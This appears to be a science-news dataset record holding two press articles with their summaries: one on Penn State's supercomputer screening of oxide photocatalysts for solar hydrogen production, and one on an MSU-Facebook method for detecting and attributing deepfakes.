A team led by Pennsylvania State University (Penn State) researchers has shown how supercomputers can identify materials that could help separate hydrogen from water using solar energy. The researchers developed an algorithm to identify materials in the online open access Materials Project database that have the properties of suitable photocatalysts, which can enable the solar hydrogen production process when added to water. They examined such things as the band gap, or the ideal energy range for the materials to absorb sunlight, as well as which materials can dissociate water effectively and which have good chemical stability. Penn State's Yihuang Xiong said, "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts."
[]
[]
[]
scitechnews
None
None
None
None
A team led by Pennsylvania State University (Penn State) researchers has shown how supercomputers can identify materials that could help separate hydrogen from water using solar energy. The researchers developed an algorithm to identify materials in the online open access Materials Project database that have the properties of suitable photocatalysts, which can enable the solar hydrogen production process when added to water. They examined such things as the band gap, or the ideal energy range for the materials to absorb sunlight, as well as which materials can dissociate water effectively and which have good chemical stability. Penn State's Yihuang Xiong said, "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts." UNIVERSITY PARK, Pa. -- Using solar energy to inexpensively harvest hydrogen from water could help replace carbon-based fuel sources and shrink the world's carbon footprint. However, finding materials that could boost hydrogen production so that it could compete economically with carbon-based fuels has been, as yet, an insurmountable challenge. In a study, a Penn State-led team of researchers report they have taken a step toward overcoming the challenge of inexpensive hydrogen production by using supercomputers to find materials that could help accelerate hydrogen separation when water is exposed to light, a process called photocatalysis. Both electricity and solar energy can be used to separate hydrogen from water, which is made up of two hydrogen atoms and an oxygen atom, according to Ismaila Dabo, associate professor of materials science and engineering . Institute for Computational and Data Sciences (ICDS) affiliate and co-funded faculty member of the Institutes of Energy and the Environment . Using sunlight to generate electricity to create hydrogen -- or electrolysis --, which, in turn, would likely be converted back into electricity may not be technically advantageous or economically effective. While using solar energy directly to produce hydrogen from water -- or photocatalysis -- avoids that extra step, researchers have yet to be able to use direct solar hydrogen conversion in a way that would compete with carbon-based fuels, such as gasoline. The researchers, who report their findings in Energy and Environmental Science , used a type of computational approach called high-throughput materials screening to narrow a list of more than 70,000 different compounds down to six promising candidates for those photocatalysts, which, when added to water, can enable the solar hydrogen production process, said Dabo. They examined the compounds listed in the Materials Project database, an online open-access repository of known and predicted materials. The team developed an algorithm to identify materials with properties that would make them suitable photocatalysts for the hydrogen production process. For example, the researchers investigated the ideal energy range -- or the band gap -- for the materials to absorb sunlight. Working closely with Héctor Abruña, professor of chemistry at Cornell; Venkatraman Gopalan, professor of materials science and engineering at Penn State; and Raymond Schaak, professor of chemistry at Penn State; they also looked at materials that could effectively dissociate water, as well as materials that offered good chemical stability. "We believe the integrated computational-experimental workflow that we have developed can considerably accelerate the discovery of efficient photocatalysts," said Yihuang Xiong, graduate research assistant and co-first author of the paper. "We hope that, by doing so, we will be able to reduce the cost of hydrogen production." Dabo added the team focused on oxides -- chemical compounds made up of at least one oxygen atom -- because they can be synthesized in a reasonable amount of time using standard processes. The work required collaborations from across disciplines, which served as a learning experience for the research team. "I found it very rewarding to have worked on such a collaborative project," said Nicole Kirchner-Hall, doctoral student and co-author of the paper. "As a graduate student specializing in computational material science, I was able to predict possible photocatalytic materials using calculations and work with experimental collaborators here at Penn State and other institutions to co-validate our computational predictions." Other researchers have previously conducted an economic analysis on several options of using solar energy to produce electricity and determined that solar could drop the price of hydrogen production to compete with gasoline, said Dabo. "Their essential conclusion was that if you were able to develop this technology, you could produce hydrogen at the cost of $1.60 to $3.20 per equivalent gallon of gasoline," said Dabo. "So, compare that to gasoline, which is around $3 a gallon, if this works, you could pay as low as $1.60 for about the same amount of energy as a gallon of gas in the ideal case scenario." He added that if a catalyst can help boost solar hydrogen production, this could lead to a hydrogen price that is competitive with gasoline. The team relied on Penn State ICDS's Roar supercomputer for the computations. According to Dabo, computers represent an important tool in speeding up the process to find the right materials to be used in specific processes. This computationally driven, data-intensive method could represent a revolution in efficiency over the painstaking trial-and-error approach. "When Thomas Edison wanted to find materials for the light bulb, he looked at just about every material under the sun until he found the right material for the light bulb," said Dabo. "Here we're trying to do the same thing, but in a way to use computers to accelerate that process." He added that computers will not replace experimentation. "Computers can make the recommendations as to what materials will be the most promising and then you still need to do the experimental study," said Dabo. Dabo said he expects the power of computers will streamline the process of finding the best candidates and dramatically cut the time it takes to design materials in the lab to bring them to market to address needs. The researchers evaluated machine learning algorithms to make suggestions for chemicals that could be synthesized and used as catalysts in solar hydrogen production. Based on this preliminary investigation, they suggest future work may focus on developing machine learning models to improve the chemical screening process. Dabo also added that they may look at chemical compounds outside of oxides to determine if they might serve as catalysts for solar hydrogen production. "So far, we did one cycle of this process on oxides -- essentially rusted metals -- but there are a lot of compounds that could be made that aren't based on oxygen," said Dabo. "For example, there are compounds based on nitrogen or sulfur, that we could explore." The National Science Foundation (NSF) and the HydroGEN Advanced Water Splitting Materials Consortium of the U.S. Department of Energy (DOE) supported this work. The team also included Quinn T. Campbell, postdoctoral scholar at Sandia National Laboratories; Julian Fanghanel, graduate student in materials science and engineering at Penn State; Catherine K. Badding, undergraduate student in chemistry at Cornell and DOE Science Undergraduate Laboratory Internship Fellow (now graduate student at MIT); Huaiyu Wang, graduate student in materials science and engineering at Penn State; Monica J. Theibault, graduate student in chemistry at Cornell; Iurii Timrov, postdoctoral scholar at École Polytechnique Fédérale de Lausanne, Switzerland; Jared S. Mondschein, graduate student in chemistry at Penn State; Kriti Seth, graduate student in chemistry at Penn State; Rebecca Katz, graduate student in chemistry at Penn State; Andrés Molina Villarino, graduate student in chemistry at Cornell; Betül Pamuk, postdoctoral scholar in physics at Cornell; Megan E. Penrod, undergraduate student in materials science and engineering at Penn State (now graduate student at University of Florida); Mohammed M. Khan, undergraduate student in materials science and engineering at Penn State (now graduate student at KAUST); Tiffany Rivera, NSF Research Experiences for Undergraduates Fellow; Nathan C. Smith, NSF Research Experiences for Undergraduates Fellow; Xavier Quintana, NSF Research Experiences for Undergraduates Fellow; Paul Orbe, NSF Research Experiences for Teachers Fellow; Craig J. Fennie, professor of physics at Cornell; Senorpe Asem-Hiablie, courtesy assistant research professor at the Penn State Institutes of Energy and the Environment; James L. Young, researcher at the National Renewable Energy Laboratory; Todd G. Deutsch, researcher at the National Renewable Energy Laboratory; and Matteo Cococcioni, professor of physics at University of Pavia, Italy.
246
MSU, Facebook Develop Research Model to Fight Deepfakes
Detecting "deepfakes," or when an existing image or video of a person is manipulated and replaced with someone else's likeness, presents a massive cybersecurity challenge: What could happen when deepfakes are created with malicious intent? Artificial intelligence experts from Michigan State University and Facebook partnered on a new reverse-engineering research method to detect and attribute deepfakes, which gives researchers and practitioners tools to better investigate incidents of coordinated disinformation using deepfakes as well as open new directions for future research. Technological advancements make it nearly impossible to tell whether an image of a person that appears on social media platforms is actually a real human. The MSU-Facebook detection method is the first to go beyond standard-model classification methods. "Our method will facilitate deepfake detection and tracing in real-world settings where the deepfake image itself is often the only information detectors have to work with," said Xiaoming Liu, MSU Foundation Professor of computer science . " It's important to go beyond current methods of image attribution because a deepfake could be created using a generative model that the current detector has not seen during its training." The team's novel framework uses fingerprint estimation to predict network architecture and loss functions of an unknown generative model given a single generated image. The new method, explained in the paper, " Reverse Engineering of Generative Models: Inferring Model Hyperparameters from Generated Images ," was developed by Liu and MSU College of Engineering doctoral candidate Vishal Asnani, and Facebook AI researchers Xi Yin and Tal Hassner. Solving the problem of proliferating deepfakes requires going beyond current methods - which focus on distinguishing a real image versus deepfake image that was generated by a model seen during training - to understand how to extend image attribution beyond the limited set of models present in training. Reverse engineering, while not a new concept in machine learning, is a different way of approaching the problem of deepfakes. Prior work on reverse engineering relies on preexisting knowledge, which limits its effectiveness in real-world cases. "Our reverse engineering method relies on uncovering the unique patterns behind the AI model used to generate a single deepfake image," said Facebook's Hassner. " With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." To test their new approach, the MSU researchers put together a fake image dataset with 100,000 synthetic images generated from 100 publicly available generative models. The research team mimicked real-world scenarios by performing cross-validation to train and evaluate the models on different splits of datasets. A more in-depth explanation of their model can be seen on Facebook's blog . The results showed that the MSU-Facebook approach performs substantially better than the random baselines of previous detection models. "The main idea is to estimate the fingerprint for each image and use it for model parsing," Liu said. "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." In addition to Facebook AI, this study by MSU is based upon work partially supported by the Defense Advanced Research Projects Agency under Agreement No. HR00112090131.
A new reverse-engineering approach developed by artificial intelligence experts at Michigan State University (MSU) and Facebook aims to identify and attribute "deepfakes." Facebook's Tal Hassner said, "With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." The researchers tested their approach using a dataset of 100,000 synthetic images produced by 100 publicly available generative models, and found that it outperformed the random baselines of previous detection models. MSU's Xiaoming Liu said, "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution."
[]
[]
[]
scitechnews
None
None
None
None
A new reverse-engineering approach developed by artificial intelligence experts at Michigan State University (MSU) and Facebook aims to identify and attribute "deepfakes." Facebook's Tal Hassner said, "With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." The researchers tested their approach using a dataset of 100,000 synthetic images produced by 100 publicly available generative models, and found that it outperformed the random baselines of previous detection models. MSU's Xiaoming Liu said, "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." Detecting "deepfakes," or when an existing image or video of a person is manipulated and replaced with someone else's likeness, presents a massive cybersecurity challenge: What could happen when deepfakes are created with malicious intent? Artificial intelligence experts from Michigan State University and Facebook partnered on a new reverse-engineering research method to detect and attribute deepfakes, which gives researchers and practitioners tools to better investigate incidents of coordinated disinformation using deepfakes as well as open new directions for future research. Technological advancements make it nearly impossible to tell whether an image of a person that appears on social media platforms is actually a real human. The MSU-Facebook detection method is the first to go beyond standard-model classification methods. "Our method will facilitate deepfake detection and tracing in real-world settings where the deepfake image itself is often the only information detectors have to work with," said Xiaoming Liu, MSU Foundation Professor of computer science . " It's important to go beyond current methods of image attribution because a deepfake could be created using a generative model that the current detector has not seen during its training." The team's novel framework uses fingerprint estimation to predict network architecture and loss functions of an unknown generative model given a single generated image. The new method, explained in the paper, " Reverse Engineering of Generative Models: Inferring Model Hyperparameters from Generated Images ," was developed by Liu and MSU College of Engineering doctoral candidate Vishal Asnani, and Facebook AI researchers Xi Yin and Tal Hassner. Solving the problem of proliferating deepfakes requires going beyond current methods - which focus on distinguishing a real image versus deepfake image that was generated by a model seen during training - to understand how to extend image attribution beyond the limited set of models present in training. Reverse engineering, while not a new concept in machine learning, is a different way of approaching the problem of deepfakes. Prior work on reverse engineering relies on preexisting knowledge, which limits its effectiveness in real-world cases. "Our reverse engineering method relies on uncovering the unique patterns behind the AI model used to generate a single deepfake image," said Facebook's Hassner. " With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." To test their new approach, the MSU researchers put together a fake image dataset with 100,000 synthetic images generated from 100 publicly available generative models. The research team mimicked real-world scenarios by performing cross-validation to train and evaluate the models on different splits of datasets. A more in-depth explanation of their model can be seen on Facebook's blog . The results showed that the MSU-Facebook approach performs substantially better than the random baselines of previous detection models. "The main idea is to estimate the fingerprint for each image and use it for model parsing," Liu said. "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." In addition to Facebook AI, this study by MSU is based upon work partially supported by the Defense Advanced Research Projects Agency under Agreement No. HR00112090131.